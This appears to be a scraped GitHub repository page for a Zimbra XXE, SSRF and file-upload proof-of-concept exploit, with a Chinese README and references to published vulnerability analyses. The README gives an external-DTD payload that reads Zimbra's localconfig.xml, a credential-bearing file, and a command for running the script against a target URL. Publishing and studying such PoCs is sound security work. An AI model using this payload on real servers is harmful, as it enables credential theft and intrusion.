fnmsd/zimbra_poc: Zimbra XXE+SSRF+UPLOAD Poc
2019-04-11 01:39:41 Author: github.com(查看原文) 阅读量:506 收藏

Join GitHub today

GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.

Sign up

Zimbra XXE+SSRF+UPLOAD Poc

Branch: master
Clone or download

Clone with HTTPS

Use Git or checkout with SVN using the web URL.

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching Xcode...

If nothing happens, download Xcode and try again.

Launching Visual Studio...

If nothing happens, download the GitHub extension for Visual Studio and try again.

Latest commit bd3f4ab Mar 27, 2019

Permalink

Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md first commit Mar 27, 2019
zimbra.py first commit Mar 27, 2019

README.md

用法

  1. 需要自己在源代码中修改dtd_url为如下内容的dtd地址:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
  1. 使用方法:
python zimbra_poc.py https://target.com
  1. POC仅供验证漏洞使用,请勿用于非法用途。

参考资料

  1. 《A Saga of Code Executions on Zimbra》

  2. What Are XML External Entity (XXE) Attacks

  3. 漏洞预警 | Zimbra 远程代码执行漏洞

  4. CVE-2013-7091 EXP

  5. Zimbra Soap API

  6. 《A Saga of Code Executions on Zimbra》RCE漏洞分析+复现过程


文章来源: https://github.com/fnmsd/zimbra_poc
如有侵权请联系:admin#unsafe.sh